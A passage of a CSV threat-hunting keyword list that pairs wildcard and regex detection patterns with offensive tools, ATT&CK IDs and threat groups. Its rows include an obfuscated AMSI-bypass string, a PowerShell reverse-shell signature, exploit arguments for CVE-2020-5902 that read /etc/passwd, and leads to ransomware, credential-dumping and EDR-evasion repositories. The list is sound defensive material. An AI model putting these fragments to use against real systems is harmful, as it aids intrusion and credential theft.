MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","#content","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","60775" "*'System.Ma'+'nag'+'eme'+'nt.Autom'+'ation.A'+'ms'+'iU'+'ti'+'ls'*",".{0,1000}\'System\.Ma\'\+\'nag\'\+\'eme\'\+\'nt\.Autom\'\+\'ation\.A\'\+\'ms\'\+\'iU\'\+\'ti\'\+\'ls\'.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","N/A","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","60777" "*System.Net.$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(*",".{0,1000}System\.Net\.\$\(\[Text\.Encoding\]\:\:Unicode\.GetString\(\[Convert\]\:\:FromBase64String\(.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","0","N/A","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","60778" "*System.Net.Sockets.TCPClient*GetStream()*iex*Out-String*",".{0,1000}System\.Net\.Sockets\.TCPClient.{0,1000}GetStream\(\).{0,1000}iex.{0,1000}Out\-String.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60779" "*SYSTEM\CurrentControlSet\Services\dcrypt*",".{0,1000}SYSTEM\\CurrentControlSet\\Services\\dcrypt.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including 
system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","#registry","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","60780" "*SYSTEM\CurrentControlSet\Services\procexp*",".{0,1000}SYSTEM\\CurrentControlSet\\Services\\procexp.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privileged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Persistence","https://github.com/trustedsec/The_Shelf","1","0","#registry #servicename","ServiceName","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60781" "*System32fileWritePermissions.txt*",".{0,1000}System32fileWritePermissions\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","60782" "*systemctl disable IMDS*",".{0,1000}systemctl\sdisable\sIMDS.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & 
Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","60789" "*systemctl enable teamserver.service*",".{0,1000}systemctl\senable\steamserver\.service.{0,1000}","offensive_tool_keyword","cobaltstrike","teamserver cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","60791" "*systemctl start IMDS*",".{0,1000}systemctl\sstart\sIMDS.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs 
the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","60794" "*systemctl start nessusd*",".{0,1000}systemctl\sstart\snessusd.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","0","#linux","N/A","9","10","N/A","N/A","N/A","N/A","60795" "*systemctl start sliver*",".{0,1000}systemctl\sstart\ssliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","60798" "*systemctl start teamserver.service*",".{0,1000}systemctl\sstart\steamserver\.service.{0,1000}","offensive_tool_keyword","cobaltstrike","teamserver cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","60800" "*systemctl start tor*",".{0,1000}systemctl\sstart\stor.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","N/A","N/A","9","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","60801" "*systemctl status IMDS*",".{0,1000}systemctl\sstatus\sIMDS.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","60802" "*systemctl status teamserver.service*",".{0,1000}systemctl\sstatus\steamserver\.service.{0,1000}","offensive_tool_keyword","cobaltstrike","teamserver cobaltstrike","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","60805" "*systemctl stop IMDS*",".{0,1000}systemctl\sstop\sIMDS.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","60809" "*SysWhispers.git 
*",".{0,1000}SysWhispers\.git\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/InlineWhispers","1","0","N/A","N/A","10","10","315","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z","60815" "*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","N/A","10","10","315","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z","60816" "*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 
- T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","N/A","10","10","185","28","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z","60817" "*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","60818" "*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","60819" 
"*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","N/A","10","1414","180","2024-07-31T05:24:06Z","2022-03-07T18:56:21Z","60820" "*SysWhispers2*",".{0,1000}SysWhispers2.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","N/A","10","10","185","28","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z","60821" "*syswhispers-apc.c*",".{0,1000}syswhispers\-apc\.c.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","N/A","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","60822" "*syswhispers-apc.h*",".{0,1000}syswhispers\-apc\.h.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","N/A","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","60823" "*syswhispers-apc-asm.x64.asm*",".{0,1000}syswhispers\-apc\-asm\.x64\.asm.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","N/A","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","60824" "*syswhispersv2_x86*",".{0,1000}syswhispersv2_x86.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","60825" "*szRemotePWDumpEXEPath*",".{0,1000}szRemotePWDumpEXEPath.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. 
This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","60826" "*szymon1118/logon_backdoor*",".{0,1000}szymon1118\/logon_backdoor.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","60828" "*-t * -x lfr -f /etc/passwd*",".{0,1000}\-t\s.{0,1000}\s\-x\slfr\s\-f\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/dunderhay/CVE-2020-5902","1","0","#linux","N/A","N/A","1","37","8","2024-03-19T01:21:06Z","2020-07-06T04:03:58Z","60829" "*-t * -x rce -a list+auth+user+admin*",".{0,1000}\-t\s.{0,1000}\s\-x\srce\s\-a\slist\+auth\+user\+admin.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/dunderhay/CVE-2020-5902","1","0","N/A","N/A","N/A","1","37","8","2024-03-19T01:21:06Z","2020-07-06T04:03:58Z","60830" "*t.me/dedsecransom*",".{0,1000}t\.me\/dedsecransom.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","1","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","60831" "*t.me/Melteddd*",".{0,1000}t\.me\/Melteddd.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - 
TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","60832" "*t.me/RipperSec\x20\x20\x20\x20\x20\x20\x1b*",".{0,1000}t\.me\/RipperSec\\x20\\x20\\x20\\x20\\x20\\x20\\x1b.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","0","#content","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","60833" "*-t: force use of Impersonation Privilege*",".{0,1000}\-t\:\sforce\suse\sof\sImpersonation\sPrivilege.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#content","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","60834" "*T0XlCv1.rule*",".{0,1000}T0XlCv1\.rule.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60835" "*T1esh0u/SecScanC2*",".{0,1000}T1esh0u\/SecScanC2.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. 
The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","#P2P","N/A","10","","N/A","","","","60836" "*t3l3machus/ACEshark*",".{0,1000}t3l3machus\/ACEshark.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","1","N/A","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","60837" "*t3l3machus/BabelStrike*",".{0,1000}t3l3machus\/BabelStrike.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","N/A","1","2","132","23","2024-07-19T07:02:42Z","2023-01-10T07:59:00Z","60838" "*t3l3machus/hoaxshell*",".{0,1000}t3l3machus\/hoaxshell.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","60839" "*t3l3machus/Synergy-httpx*",".{0,1000}t3l3machus\/Synergy\-httpx.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","N/A","8","2","129","17","2024-07-19T06:40:59Z","2023-06-02T10:06:41Z","60840" "*TailorScan.exe *",".{0,1000}TailorScan\.exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 